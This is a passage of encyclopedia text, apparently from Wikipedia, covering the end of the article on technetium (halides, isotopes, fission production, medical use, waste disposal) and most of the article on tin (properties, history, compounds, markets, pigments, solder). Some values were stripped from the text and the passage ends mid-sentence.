Tc2O7. Upon heating, TcCl4 gives the corresponding Tc(III) and Tc(II) chlorides. The structure of TcCl4 is composed of infinite zigzag chains of edge-sharing TcCl6 octahedra. It is isomorphous to transition metal tetrachlorides of zirconium, hafnium, and platinum. Two polymorphs of technetium trichloride exist, α- and β-TcCl3. The α polymorph is also denoted as Tc3Cl9. It adopts a confacial bioctahedral structure. It is prepared by treating the chloro-acetate Tc2(O2CCH3)4Cl2 with HCl. Like Re3Cl9, the structure of the α-polymorph consists of triangles with short M-M distances. β-TcCl3 features octahedral Tc centers, which are organized in pairs, as seen also for molybdenum trichloride. TcBr3 does not adopt the structure of either trichloride phase. Instead it has the structure of molybdenum tribromide, consisting of chains of confacial octahedra with alternating short and long Tc—Tc contacts. TcI3 has the same structure as the high temperature phase of TiI3, featuring chains of confacial octahedra with equal Tc—Tc contacts. Several anionic technetium halides are known. The binary tetrahalides can be converted to the hexahalides [TcX6]2− (X = F, Cl, Br, I), which adopt octahedral molecular geometry. More reduced halides form anionic clusters with Tc–Tc bonds. The situation is similar for the related elements of Mo, W, Re. These clusters have the nuclearity Tc4, Tc6, Tc8, and Tc13. The more stable Tc6 and Tc8 clusters have prism shapes where vertical pairs of Tc atoms are connected by triple bonds and the planar atoms by single bonds. Every technetium atom makes six bonds, and the remaining valence electrons can be saturated by one axial and two bridging ligand halogen atoms such as chlorine or bromine. Coordination and organometallic complexes Technetium forms a variety of coordination complexes with organic ligands. Many have been well-investigated because of their relevance to nuclear medicine. Technetium forms a variety of compounds with Tc–C bonds, i.e. organotechnetium complexes. Prominent members of this class are complexes with CO, arene, and cyclopentadienyl ligands. The binary carbonyl Tc2(CO)10 is a white volatile solid. In this molecule, two technetium atoms are bound to each other; each atom is surrounded by octahedra of five carbonyl ligands. The bond length between technetium atoms, 303 pm, is significantly larger than the distance between two atoms in metallic technetium (272 pm). Similar carbonyls are formed by technetium's congeners, manganese and rhenium. Interest in organotechnetium compounds has also been motivated by applications in nuclear medicine. Technetium also forms aquo-carbonyl complexes, one prominent complex being [Tc(CO)3(H2O)3]+, which are unusual compared to other metal carbonyls. Isotopes Technetium, with atomic number Z = 43, is the lowest-numbered element in the periodic table for which all isotopes are radioactive. The second-lightest exclusively radioactive element, promethium, has atomic number 61. Atomic nuclei with an odd number of protons are less stable than those with even numbers, even when the total number of nucleons (protons + neutrons) is even, and odd numbered elements have fewer stable isotopes. The most stable radioactive isotopes are technetium-97 with a half-life of  million years and technetium-98 with  million years; current measurements of their half-lives give overlapping confidence intervals corresponding to one standard deviation and therefore do not allow a definite assignment of technetium's most stable isotope. The next most stable isotope is technetium-99, which has a half-life of 211,100 years. Thirty-four other radioisotopes have been characterized with mass numbers ranging from 86 to 122. Most of these have half-lives that are less than an hour, the exceptions being technetium-93 (2.73 hours), technetium-94 (4.88 hours), technetium-95 (20 hours), and technetium-96 (4.3 days). The primary decay mode for isotopes lighter than technetium-98 (98Tc) is electron capture, producing molybdenum (Z = 42). For technetium-98 and heavier isotopes, the primary mode is beta emission (the emission of an electron or positron), producing ruthenium (Z = 44), with the exception that technetium-100 can decay both by beta emission and electron capture. Technetium also has numerous nuclear isomers, which are isotopes with one or more excited nucleons. Technetium-97m (97mTc; "m" stands for metastability) is the most stable, with a half-life of 91 days and excitation energy 0.0965 MeV. This is followed by technetium-95m (61 days, 0.03 MeV), and technetium-99m (6.01 hours, 0.142 MeV). Technetium-99 (99Tc) is a major product of the fission of uranium-235 (235U), making it the most common and most readily available isotope of technetium. One gram of technetium-99 produces per second (in other words, the specific activity of 99Tc is 0.62 GBq/g). Occurrence and production Technetium occurs naturally in the Earth's crust in minute concentrations of about 0.003 parts per trillion. Technetium is so rare because the half-lives of 97Tc and 98Tc are only More than a thousand of such periods have passed since the formation of the Earth, so the probability of survival of even one atom of primordial technetium is effectively zero. However, small amounts exist as spontaneous fission products in uranium ores. A kilogram of uranium contains an estimated 1 nanogram equivalent to ten trillion atoms of technetium. Some red giant stars with the spectral types S-, M-, and N display a spectral absorption line indicating the presence of technetium. These red giants are known informally as technetium stars. Fission waste product In contrast to the rare natural occurrence, bulk quantities of technetium-99 are produced each year from spent nuclear fuel rods, which contain various fission products. The fission of a gram of uranium-235 in nuclear reactors yields 27 mg of technetium-99, giving technetium a fission product yield of 6.1%. Other fissile isotopes produce similar yields of technetium, such as 4.9% from uranium-233 and 6.21% from plutonium-239. An estimated 49,000 TBq (78 metric tons) of technetium was produced in nuclear reactors between 1983 and 1994, by far the dominant source of terrestrial technetium. Only a fraction of the production is used commercially. Technetium-99 is produced by the nuclear fission of both uranium-235 and plutonium-239. It is therefore present in radioactive waste and in the nuclear fallout of fission bomb explosions. Its decay, measured in becquerels per amount of spent fuel, is the dominant contributor to nuclear waste radioactivity after about after the creation of the nuclear waste. From 1945–1994, an estimated 160 TBq (about 250 kg) of technetium-99 was released into the environment during atmospheric nuclear tests. The amount of technetium-99 from nuclear reactors released into the environment up to 1986 is on the order of 1000 TBq (about 1600 kg), primarily by nuclear fuel reprocessing; most of this was discharged into the sea. Reprocessing methods have reduced emissions since then, but as of 2005 the primary release of technetium-99 into the environment is by the Sellafield plant, which released an estimated 550 TBq (about 900 kg) from 1995 to 1999 into the Irish Sea. From 2000 onwards the amount has been limited by regulation to 90 TBq (about 140 kg) per year. Discharge of technetium into the sea resulted in contamination of some seafood with minuscule quantities of this element. For example, European lobster and fish from west Cumbria contain about 1 Bq/kg of technetium. Fission product for commercial use The metastable isotope technetium-99m is continuously produced as a fission product from the fission of uranium or plutonium in nuclear reactors: ^{238}_{92}U ->[\ce{sf}] ^{137}_{53}I + ^{99}_{39}Y + 2^{1}_{0}n ^{99}_{39}Y ->[\beta^-][1.47\,\ce{s}] ^{99}_{40}Zr ->[\beta^-][2.1\,\ce{s}] ^{99}_{41}Nb ->[\beta^-][15.0\,\ce{s}] ^{99}_{42}Mo ->[\beta^-][65.94\,\ce{h}] ^{99}_{43}Tc ->[\beta^-][211,100\,\ce{y}] ^{99}_{44}Ru Because used fuel is allowed to stand for several years before reprocessing, all molybdenum-99 and technetium-99m is decayed by the time that the fission products are separated from the major actinides in conventional nuclear reprocessing. The liquid left after plutonium–uranium extraction (PUREX) contains a high concentration of technetium as but almost all of this is technetium-99, not technetium-99m. The vast majority of the technetium-99m used in medical work is produced by irradiating dedicated highly enriched uranium targets in a reactor, extracting molybdenum-99 from the targets in reprocessing facilities, and recovering at the diagnostic center the technetium-99m produced upon decay of molybdenum-99. Molybdenum-99 in the form of molybdate is adsorbed onto acid alumina () in a shielded column chromatograph inside a technetium-99m generator ("technetium cow", also occasionally called a "molybdenum cow"). Molybdenum-99 has a half-life of 67 hours, so short-lived technetium-99m (half-life: 6 hours), which results from its decay, is being constantly produced. The soluble pertechnetate can then be chemically extracted by elution using a saline solution. A drawback of this process is that it requires targets containing uranium-235, which are subject to the security precautions of fissile materials. Almost two-thirds of the world's supply comes from two reactors; the National Research Universal Reactor at Chalk River Laboratories in Ontario, Canada, and the High Flux Reactor at Nuclear Research and Consultancy Group in Petten, Netherlands. All major reactors that produce technetium-99m were built in the 1960s and are close to the end of life. The two new Canadian Multipurpose Applied Physics Lattice Experiment reactors planned and built to produce 200% of the demand of technetium-99m relieved all other producers from building their own reactors. With the cancellation of the already tested reactors in 2008, the future supply of technetium-99m became problematic. Waste disposal The long half-life of technetium-99 and its potential to form anionic species creates a major concern for long-term disposal of radioactive waste. Many of the processes designed to remove fission products in reprocessing plants aim at cationic species such as caesium (e.g., caesium-137) and strontium (e.g., strontium-90). Hence the pertechnetate escapes through those processes. Current disposal options favor burial in continental, geologically stable rock. The primary danger with such practice is the likelihood that the waste will contact water, which could leach radioactive contamination into the environment. The anionic pertechnetate and iodide tend not to adsorb into the surfaces of minerals, and are likely to be washed away. By comparison plutonium, uranium, and caesium tend to bind to soil particles. Technetium could be immobilized by some environments, such as microbial activity in lake bottom sediments, and the environmental chemistry of technetium is an area of active research. An alternative disposal method, transmutation, has been demonstrated at CERN for technetium-99. In this process, the technetium (technetium-99 as a metal target) is bombarded with neutrons to form the short-lived technetium-100 (half-life = 16 seconds) which decays by beta decay to stable ruthenium-100. If recovery of usable ruthenium is a goal, an extremely pure technetium target is needed; if small traces of the minor actinides such as americium and curium are present in the target, they are likely to undergo fission and form more fission products which increase the radioactivity of the irradiated target. The formation of ruthenium-106 (half-life 374 days) from the 'fresh fission' is likely to increase the activity of the final ruthenium metal, which will then require a longer cooling time after irradiation before the ruthenium can be used. The actual separation of technetium-99 from spent nuclear fuel is a long process. During fuel reprocessing, it comes out as a component of the highly radioactive waste liquid. After sitting for several years, the radioactivity reduces to a level where extraction of the long-lived isotopes, including technetium-99, becomes feasible. A series of chemical processes yields technetium-99 metal of high purity. Neutron activation Molybdenum-99, which decays to form technetium-99m, can be formed by the neutron activation of molybdenum-98. When needed, other technetium isotopes are not produced in significant quantities by fission, but are manufactured by neutron irradiation of parent isotopes (for example, technetium-97 can be made by neutron irradiation of ruthenium-96). Particle accelerators The feasibility of technetium-99m production with the 22-MeV-proton bombardment of a molybdenum-100 target in medical cyclotrons following the reaction 100Mo(p,2n)99mTc was demonstrated in 1971. The recent shortages of medical technetium-99m reignited the interest in its production by proton bombardment of isotopically enriched (>99.5%) molybdenum-100 targets. Other techniques are being investigated for obtaining molybdenum-99 from molybdenum-100 via (n,2n) or (γ,n) reactions in particle accelerators. Applications Nuclear medicine and biology Technetium-99m ("m" indicates that this is a metastable nuclear isomer) is used in radioactive isotope medical tests. For example, technetium-99m is a radioactive tracer that medical imaging equipment tracks in the human body. It is well suited to the role because it emits readily detectable 140 keV gamma rays, and its half-life is 6.01 hours (meaning that about 94% of it decays to technetium-99 in 24 hours). The chemistry of technetium allows it to be bound to a variety of biochemical compounds, each of which determines how it is metabolized and deposited in the body, and this single isotope can be used for a multitude of diagnostic tests. More than 50 common radiopharmaceuticals are based on technetium-99m for imaging and functional studies of the brain, heart muscle, thyroid, lungs, liver, gall bladder, kidneys, skeleton, blood, and tumors. The longer-lived isotope, technetium-95m with a half-life of 61 days, is used as a radioactive tracer to study the movement of technetium in the environment and in plant and animal systems. Industrial and chemical Technetium-99 decays almost entirely by beta decay, emitting beta particles with consistent low energies and no accompanying gamma rays. Moreover, its long half-life means that this emission decreases very slowly with time. It can also be extracted to a high chemical and isotopic purity from radioactive waste. For these reasons, it is a National Institute of Standards and Technology (NIST) standard beta emitter, and is used for equipment calibration. Technetium-99 has also been proposed for optoelectronic devices and nanoscale nuclear batteries. Like rhenium and palladium, technetium can serve as a catalyst. In processes such as the dehydrogenation of isopropyl alcohol, it is a far more effective catalyst than either rhenium or palladium. However, its radioactivity is a major problem in safe catalytic applications. When steel is immersed in water, adding a small concentration (55 ppm) of potassium pertechnetate(VII) to the water protects the steel from corrosion, even if the temperature is raised to . For this reason, pertechnetate has been used as an anodic corrosion inhibitor for steel, although technetium's radioactivity poses problems that limit this application to self-contained systems. While (for example) can also inhibit corrosion, it requires a concentration ten times as high. In one experiment, a specimen of carbon steel was kept in an aqueous solution of pertechnetate for 20 years and was still uncorroded. The mechanism by which pertechnetate prevents corrosion is not well understood, but seems to involve the reversible formation of a thin surface layer (passivation). One theory holds that the pertechnetate reacts with the steel surface to form a layer of technetium dioxide which prevents further corrosion; the same effect explains how iron powder can be used to remove pertechnetate from water. The effect disappears rapidly if the concentration of pertechnetate falls below the minimum concentration or if too high a concentration of other ions is added. As noted, the radioactive nature of technetium (3 MBq/L at the concentrations required) makes this corrosion protection impractical in almost all situations. Nevertheless, corrosion protection by pertechnetate ions was proposed (but never adopted) for use in boiling water reactors. Precautions Technetium plays no natural biological role and is not normally found in the human body. Technetium is produced in quantity by nuclear fission, and spreads more readily than many radionuclides. It appears to have low chemical toxicity. For example, no significant change in blood formula, body and organ weights, and food consumption could be detected for rats which ingested up to 15 μg of technetium-99 per gram of food for several weeks. In the body, technetium quickly gets converted to the stable ion, which is highly water-soluble and quickly excreted. The radiological toxicity of technetium (per unit of mass) is a function of compound, type of radiation for the isotope in question, and the isotope's half-life. All isotopes of technetium must be handled carefully. The most common isotope, technetium-99, is a weak beta emitter; such radiation is stopped by the walls of laboratory glassware. The primary hazard when working with technetium is inhalation of dust; such radioactive contamination in the lungs can pose a significant cancer risk. For most work, careful handling in a fume hood is sufficient, and a glove box is not needed.
Physical sciences
Chemical elements_2
null
30042
https://en.wikipedia.org/wiki/Tin
Tin
Tin is a chemical element; it has symbol Sn () and atomic number 50. A silvery-colored metal, tin is soft enough to be cut with little force, and a bar of tin can be bent by hand with little effort. When bent, the so-called "tin cry" can be heard as a result of twinning in tin crystals. Tin is a post-transition metal in group 14 of the periodic table of elements. It is obtained chiefly from the mineral cassiterite, which contains stannic oxide, . Tin shows a chemical similarity to both of its neighbors in group 14, germanium and lead, and has two main oxidation states, +2 and the slightly more stable +4. Tin is the 49th most abundant element on Earth, making up 0.00022% of its crust, and with 10 stable isotopes, it has the largest number of stable isotopes in the periodic table, due to its magic number of protons. It has two main allotropes: at room temperature, the stable allotrope is β-tin, a silvery-white, malleable metal; at low temperatures it is less dense grey α-tin, which has the diamond cubic structure. Metallic tin does not easily oxidize in air and water. The first tin alloy used on a large scale was bronze, made of  tin and  copper (12.5% and 87.5% respectively), from as early as 3000 BC. After 600 BC, pure metallic tin was produced. Pewter, which is an alloy of 85–90% tin with the remainder commonly consisting of copper, antimony, bismuth, and sometimes lead and silver, has been used for flatware since the Bronze Age. In modern times, tin is used in many alloys, most notably tin-lead soft solders, which are typically 60% or more tin, and in the manufacture of transparent, electrically conducting films of indium tin oxide in optoelectronic applications. Another large application is corrosion-resistant tin plating of steel. Because of the low toxicity of inorganic tin, tin-plated steel is widely used for food packaging as "tin cans". Some organotin compounds can be extremely toxic. Characteristics Physical Tin is a soft, malleable, ductile and highly crystalline silvery-white metal. When a bar of tin is bent a crackling sound known as the "tin cry" can be heard from the twinning of the crystals. This trait is shared by indium, cadmium, zinc, and mercury in its solid state. Tin melts at about , the lowest in group 14, and boils at , the second lowest (ahead of lead) in its group. The melting point is further lowered to for 11 nm particles. β-tin, also called white tin, is the allotrope (structural form) of elemental tin that is stable at and above room temperature. It is metallic and malleable, and has body-centered tetragonal crystal structure. α-tin, or gray tin, is the nonmetallic form. It is stable below and is brittle. α-tin has a diamond cubic crystal structure, as do diamond and silicon. α-tin does not have metallic properties because its atoms form a covalent structure in which electrons cannot move freely. α-tin is a dull-gray powdery material with no common uses other than specialized semiconductor applications. γ-tin and σ-tin exist at temperatures above   and pressures above several GPa. In cold conditions β-tin tends to transform spontaneously into α-tin, a phenomenon known as "tin pest" or "tin disease". Some unverifiable sources also say that, during Napoleon's Russian campaign of 1812, the temperatures became so cold that the tin buttons on the soldiers' uniforms disintegrated over time, contributing to the defeat of the Grande Armée, a persistent legend. The α-β transformation temperature is , but impurities (e.g. Al, Zn, etc.) lower it well below . With the addition of antimony or bismuth the transformation might not occur at all, increasing durability. Commercial grades of tin (99.8% tin content) resist transformation because of the inhibiting effect of small amounts of bismuth, antimony, lead, and silver present as impurities. Alloying elements such as copper, antimony, bismuth, cadmium, and silver increase the hardness of tin. Tin easily forms hard, brittle intermetallic phases that are typically undesirable. It does not mix into a solution with most metals and elements so tin does not have much solid solubility. Tin mixes well with bismuth, gallium, lead, thallium and zinc, forming simple eutectic systems. Tin becomes a superconductor below 3.72 K and was one of the first superconductors to be studied. The Meissner effect, one of the characteristic features of superconductors, was first discovered in superconducting tin crystals. Chemical Tin resists corrosion from water, but can be corroded by acids and alkalis. Tin can be highly polished and is used as a protective coat for other metals. When heated in air it oxidizes slowly to form a thin passivation layer of stannic oxide () that inhibits further oxidation. Isotopes Tin has ten stable isotopes, the greatest number of any element. Their mass numbers are 112, 114, 115, 116, 117, 118, 119, 120, 122, and 124. Tin-120 makes up almost a third of all tin. Tin-118 and tin-116 are also common. Tin-115 is the least common stable isotope. The isotopes with even mass numbers have no nuclear spin, while those with odd mass numbers have a nuclear spin of 1/2. It is thought that tin has such a great multitude of stable isotopes because of tin's atomic number being 50, which is a "magic number" in nuclear physics. Tin is one of the easiest elements to detect and analyze by NMR spectroscopy, which relies on molecular weight and its chemical shifts are referenced against tetramethyltin (). Of the stable isotopes, tin-115 has a high neutron capture cross section for fast neutrons, at 30 barns. Tin-117 has a cross section of 2.3 barns, one order of magnitude smaller, while tin-119 has a slightly smaller cross section of 2.2 barns. Before these cross sections were well known, it was proposed to use tin-lead solder as a coolant for fast reactors because of its low melting point. Current studies are for lead or lead-bismuth reactor coolants because both heavy metals are nearly transparent to fast neutrons, with very low capture cross sections. In order to use a tin or tin-lead coolant, the tin would first have to go through isotopic separation to remove the isotopes with odd mass number. Combined, these three isotopes make up about 17% of natural tin but represent nearly all of the capture cross section. Of the remaining seven isotopes tin-112 has a capture cross section of 1 barn. The other six isotopes forming 82.7% of natural tin have capture cross sections of 0.3 barns or less, making them effectively transparent to neutrons. Tin has 31 unstable isotopes, ranging in mass number from 99 to 139. The unstable tin isotopes have half-lives of less than a year except for tin-126, which has a half-life of about 230,000 years. Tin-100 and tin-132 are two of the very few nuclides with a "doubly magic" nucleus which despite being unstable, as they have very uneven neutron–proton ratios, are the endpoints beyond which tin isotopes lighter than tin-100 and heavier than tin-132 are much less stable. Another 30 metastable isomers have been identified for tin isotopes between 111 and 131, the most stable being tin-121m, with a half-life of 43.9 years. The relative differences in the abundances of tin's stable isotopes can be explained by how they are formed during stellar nucleosynthesis. Tin-116 through tin-120, along with tin-122, are formed in the s-process (slow neutron capture) in most stars which leads to them being the most common tin isotopes, while tin-124 is only formed in the r-process (rapid neutron capture) in supernovae and neutron star mergers. Tin isotopes 115, 117 through 120, and 122 are produced via both the s-process and the r-process, The two lightest stable isotopes, tin-112 and tin-114, cannot be made in significant amounts in the s- or r-processes and are among the p-nuclei whose origins are not well understood. Some theories about their formation include proton capture and photodisintegration. Tin-115 might be partially produced in the s-process, both directly and as the daughter of long-lived indium-115, and also from the decay of indium-115 produced via the r-process. Etymology The word tin is shared among Germanic languages and can be traced back to reconstructed Proto-Germanic ; cognates include German , Swedish and Dutch . It is not found in other branches of Indo-European, except by borrowing from Germanic (e.g., Irish from English). The Latin name for tin, , originally meant an alloy of silver and lead, and came to mean 'tin' in the fourth century—the earlier Latin word for it was , or "white lead". apparently came from an earlier (meaning the same substance), the origin of the Romance and Celtic terms for tin, such as French , Spanish , Italian , and Irish . The origin of / is unknown; it may be pre-Indo-European. The suggests instead that came from Cornish , and is evidence that Cornwall in the first centuries AD was the main source of tin. History Tin extraction and use can be dated to the beginnings of the Bronze Age around 3000 BC, when it was observed that copper objects formed of polymetallic ores with different metal contents had different physical properties. The earliest bronze objects had a tin or arsenic content of less than 2% and are believed to be the result of unintentional alloying due to trace metal content in the copper ore. The addition of a second metal to copper increases its hardness, lowers the melting temperature, and improves the casting process by producing a more fluid melt that cools to a denser, less spongy metal. This was an important innovation that allowed for the much more complex shapes cast in closed molds of the Bronze Age. Arsenical bronze objects appear first in the Near East where arsenic is commonly found with copper ore, but the health risks were quickly realized and the quest for sources of the much less hazardous tin ores began early in the Bronze Age. This created the demand for rare tin metal and formed a trade network that linked the distant sources of tin to the markets of Bronze Age cultures. Cassiterite (), the oxide form of tin, was most likely the original source of tin. Other tin ores are less common sulfides such as stannite that require a more involved smelting process. Cassiterite often accumulates in alluvial channels as placer deposits because it is harder, heavier, and more chemically resistant than the accompanying granite. Cassiterite is usually black or dark in color, and these deposits can be easily seen in river banks. Alluvial (placer) deposits may incidentally have been collected and separated by methods similar to gold panning. Compounds and chemistry In the great majority of its compounds, tin has the oxidation state II or IV. Compounds containing bivalent tin are called while those containing tetravalent tin are termed . Inorganic compounds Halide compounds are known for both oxidation states. For Sn(IV), all four halides are well known: SnF4, SnCl4, SnBr4, and SnI4. The three heavier members are volatile molecular compounds, whereas the tetrafluoride is polymeric. All four halides are known for Sn(II) also: SnF2, , SnBr2, and SnI2. All are polymeric solids. Of these eight compounds, only the iodides are colored. Tin(II) chloride (also known as stannous chloride) is the most important commercial tin halide. Illustrating the routes to such compounds, chlorine reacts with tin metal to give SnCl4 whereas the reaction of hydrochloric acid and tin produces and hydrogen gas. Alternatively SnCl4 and Sn combine to stannous chloride by a process called comproportionation: SnCl4 + Sn → 2 Tin can form many oxides, sulfides, and other chalcogenide derivatives. The dioxide (cassiterite) forms when tin is heated in the presence of air. is amphoteric, which means that it dissolves in both acidic and basic solutions. Stannates with the structure []2−, like [], are also known, though the free stannic acid [] is unknown. Sulfides of tin exist in both the +2 and +4 oxidation states: tin(II) sulfide and tin(IV) sulfide (mosaic gold). Hydrides Stannane (), with tin in the +4 oxidation state, is unstable. Organotin hydrides are however well known, e.g. tributyltin hydride (Sn(C4H9)3H). These compounds release transient tributyl tin radicals, which are rare examples of compounds of tin(III). Organotin compounds Organotin compounds, sometimes called stannanes, are chemical compounds with tin–carbon bonds. Of the tin compounds, the organic derivatives are commercially the most useful. Some organotin compounds are highly toxic and have been used as biocides. The first organotin compound to be reported was diethyltin diiodide ((C2H5)2SnI2), reported by Edward Frankland in 1849. Most organotin compounds are colorless liquids or solids that are stable to air and water. They adopt tetrahedral geometry. Tetraalkyl- and tetraaryltin compounds can be prepared using Grignard reagents: + 4 RMgBr → + 4 MgBrCl The mixed halide-alkyls, which are more common and more important commercially than the tetraorgano derivatives, are prepared by redistribution reactions: + → 2 R2 Divalent organotin compounds are uncommon, although more common than related divalent organogermanium and organosilicon compounds. The greater stabilization enjoyed by Sn(II) is attributed to the "inert pair effect". Organotin(II) compounds include both stannylenes (formula: R2Sn, as seen for singlet carbenes) and distannylenes (R4Sn2), which are roughly equivalent to alkenes. Both classes exhibit unusual reactions. Occurrence Tin is generated via the long s-process in low-to-medium mass stars (with masses of 0.6 to 10 times that of the Sun), and finally by beta decay of the heavy isotopes of indium. Tin is the 49th most abundant element in Earth's crust, representing 2 ppm compared with 75 ppm for zinc, 50 ppm for copper, and 14 ppm for lead. Tin does not occur as the native element but must be extracted from various ores. Cassiterite () is the only commercially important source of tin, although small quantities of tin are recovered from complex sulfides such as stannite, cylindrite, franckeite, canfieldite, and teallite. Minerals with tin are almost always associated with granite rock, usually at a level of 1% tin oxide content. Because of the higher specific gravity of tin dioxide, about 80% of mined tin is from secondary deposits found downstream from the primary lodes. Tin is often recovered from granules washed downstream in the past and deposited in valleys or the sea. The most economical ways of mining tin are by dredging, hydraulicking, or open pits. Most of the world's tin is produced from placer deposits, which can contain as little as 0.015% tin. About 253,000 tonnes of tin were mined in 2011, mostly in China (110,000 t), Indonesia (51,000 t), Peru (34,600 t), Bolivia (20,700 t) and Brazil (12,000 t). Estimates of tin production have historically varied with the market and mining technology. It is estimated that, at current consumption rates and technologies, the Earth will run out of mine-able tin in 40 years. In 2006 Lester Brown suggested tin could run out within 20 years based on conservative estimates of 2% annual growth. Scrap tin is an important source of the metal. Recovery of tin through recycling is increasing rapidly as of 2019. Whereas the United States has neither mined (since 1993) nor smelted (since 1989) tin, it was the largest secondary producer, recycling nearly 14,000 tonnes in 2006. New deposits are reported in Mongolia, and in 2009, new deposits of tin were discovered in Colombia. Production Tin is produced by carbothermic reduction of the oxide ore with carbon or coke. Both reverberatory furnace and electric furnace can be used: SnO2 + C Sn + CO2↑ Mining and smelting Industry The ten largest tin-producing companies produced most of the world's tin in 2007. Most of the world's tin is traded on LME, from 8 countries, under 17 brands. The International Tin Council was established in 1947 to control the price of tin. It collapsed in 1985. In 1984, the Association of Tin Producing Countries was created, with Australia, Bolivia, Indonesia, Malaysia, Nigeria, Thailand, and Zaire as members. Price and exchanges Tin is unique among mineral commodities because of the complex agreements between producer countries and consumer countries dating back to 1921. Earlier agreements tended to be somewhat informal and led to the "First International Tin Agreement" in 1956, the first of a series that effectively collapsed in 1985. Through these agreements, the International Tin Council (ITC) had a considerable effect on tin prices. ITC supported the price of tin during periods of low prices by buying tin for its buffer stockpile and was able to restrain the price during periods of high prices by selling from the stockpile. This was an anti-free-market approach, designed to assure a sufficient flow of tin to consumer countries and a profit for producer countries. However, the buffer stockpile was not sufficiently large, and during most of those 29 years tin prices rose, sometimes sharply, especially from 1973 through 1980 when rampant inflation plagued many world economies. During the late 1970s and early 1980s, the U.S. reduced its strategic tin stockpile, partly to take advantage of historically high tin prices. The 1981–82 recession damaged the tin industry. Tin consumption declined dramatically. ITC was able to avoid truly steep declines through accelerated buying for its buffer stockpile; this activity required extensive borrowing. ITC continued to borrow until late 1985 when it reached its credit limit. Immediately, a major "tin crisis" ensued—tin was delisted from trading on the London Metal Exchange for about three years. ITC dissolved soon afterward, and the price of tin, now in a free-market environment, fell to $4 per pound and remained around that level through the 1990s. The price increased again by 2010 with a rebound in consumption following the 2007–2008 economic crisis, accompanying restocking and continued growth in consumption. London Metal Exchange (LME) is tin's principal trading site. Other tin contract markets are Kuala Lumpur Tin Market (KLTM) and Indonesia Tin Exchange (INATIN). Due to factors involved in the 2021 global supply chain crisis, tin prices almost doubled during 2020–21 and have had their largest annual rise in over 30 years. Global refined tin consumption dropped 1.6 percent in 2020 as the COVID-19 pandemic disrupted global manufacturing industries. Applications In 2018, just under half of all tin produced was used in solder. The rest was divided between tin plating, tin chemicals, brass and bronze alloys, and niche uses. Pigments Pigment Yellow 38, tin(IV) sulfide, is known as mosaic gold. Purple of Cassius, Pigment Red 109, a hydrous double stannate of gold, was mainly, in terms of painting, restricted to miniatures due to its high cost. It was widely used to make cranberry glass. It has also been used in the arts to stain porcelain. Lead-tin yellow (which occurs in two yellow forms — a stannate and a silicate) was a pigment that was historically highly important for oil painting and which had some use in fresco in its silicate form. Lead stannate is also known in orange form but has not seen wide use in the fine arts. It is available for purchase in pigment form from specialist artists' suppliers. There is another minor form, in terms of artistic usage and availability, of lead-tin yellow known as Lead-tin Antimony Yellow. Cerulean blue, a somewhat dull cyan chemically known as cobalt stannate, continues to be an important artists' pigment. Its hue is similar to that of Manganese blue, Pigment Blue 33, although it lacks that pigment's colorfulness and is more opaque. Artists typically must choose between cobalt stannate and manganese blue imitations made with phthalocyanine blue green shade (Pigment Blue 15:3), as industrial production of manganese blue pigment ceased in the 1970s. Cerulean blue made with cobalt stannate, however, was popular with artists prior to the production of Manganese blue. Pigment Red 233, commonly known as Pinkcolor or Potter's Pink and more precisely known as Chrome Tin Pink Sphene, is a historically important pigment in watercolor. However, it has enjoyed a large resurgence in popularity due to Internet-based word-of-mouth. It is fully lightfast and chemically stable in both oil paints and watercolors. Other inorganic mixed metal complex pigments, produced via calcination, often feature tin as a constituent. These pigments are known for their lightfastness, weatherfastness, chemical stability, lack of toxicity, and opacity. Many are rather dull in terms of colorfulness. However, some possess enough colorfulness to be competitive for use cases that require more than a moderate amount of it. Some are prized for other qualities. For instance, Pinkcolor is chosen by many watercolorists for its strong granulation, even though its chroma is low. Recently, NTP Yellow (a pyrochlore) has been brought to market as a non-toxic replacement for lead(II) chromate with greater opacity, lightfastness, and weathering resistance than proposed organic lead chromate replacement pigments possess. NTP Yellow possesses the highest level of color saturation of these contemporary inorganic mixed metal complex pigments. More examples of this group include Pigment Yellow 158 (Tin Vanadium Yellow Cassiterite), Pigment Yellow 216 (Solaplex Yellow), Pigment Yellow 219 (Titanium Zinc Antimony Stannate), Pigment Orange 82 (Tin Titanium Zinc oxide, also known as Sicopal Orange), Pigment Red 121 (also known as Tin Violet and Chromium stannate), Pigment Red 230 (Chrome Alumina Pink Corundum), Pigment Red 236 (Chrome Tin Orchid Cassiterite), and Pigment Black 23 (Tin Antimony Grey Cassiterite). Another blue pigment with tin and cobalt is Pigment Blue 81, Cobalt Tin Alumina Blue Spinel. Pigment White 15, tin(IV) oxide, is used for its iridescence, most commonly as a ceramic glaze. There are no green pigments that have been used by artists that have tin as a constituent and purplish pigments with tin are classified as red, according to the Colour Index International. Solder Tin has long been used in alloys with lead as solder, in amounts of 5 to 70% w/w. Tin with lead forms a eutectic mixture at the weight proportion of 61.9% tin and 38.1% lead (the atomic proportion: 73.9% tin and 26.1% lead), with melting temperature of 183 °C (361.4 °F). Such solders are primarily used for joining pipes or electric circuits. Since the European Union Waste Electrical and Electronic Equipment Directive (WEEE Directive) and Restriction of Hazardous Substances Directive came into effect on 1 July 2006, the lead content in such alloys has decreased. While lead exposure is associated with serious health problems, lead-free solder is not without its challenges, including a higher melting point, and the formation of tin whiskers that cause electrical problems. Tin pest can occur in lead-free solders, leading to loss of the soldered joint. Replacement alloys are being found, but the problems of joint integrity remain. A common lead-free alloy is 99% tin, 0.7% copper, and 0.3% silver, with melting temperature of 217 °C (422.6 °F). Tin plating Tin bonds readily to iron and is used for coating lead, zinc, and steel to prevent corrosion. Tin-plated (or tinned) steel containers are widely used for food preservation, and this forms a large part of the market for metallic tin. A tinplate canister for preserving food was first manufactured in London in 1812. Speakers of British English call such containers "tins", while speakers of U.S. English call them "cans" or "tin cans". One derivation of such use is the slang term "tinnie" or "tinny", meaning "can of beer" in Australia. The tin whistle is so called because it was mass-produced first in tin-plated steel. Copper cooking vessels such as saucepans and frying pans are frequently lined with a thin plating of tin, by electroplating or by traditional chemical methods, since use of copper cookware with acidic foods can be toxic. Specialized alloys Tin in combination with other elements forms a wide variety of useful alloys. Tin is most commonly alloyed with copper. Pewter is 85–99% tin, and bearing metal has a high percentage of tin as well. Bronze is mostly copper with 12% tin, while the addition of phosphorus yields phosphor bronze. Bell metal is also a copper–tin alloy, containing 22% tin. Tin has sometimes been used in coinage; it once formed a single-digit percentage (usually five percent or less) of American and Canadian pennies. The niobium–tin compound Nb3Sn is commercially used in coils of superconducting magnets for its high critical temperature (18 K) and critical magnetic field (25 T). A superconducting magnet weighing as little as two kilograms is capable of producing the magnetic field of a conventional electromagnet weighing tons. A small percentage of tin is added to zirconium alloys for the cladding of nuclear fuel. Most metal pipes 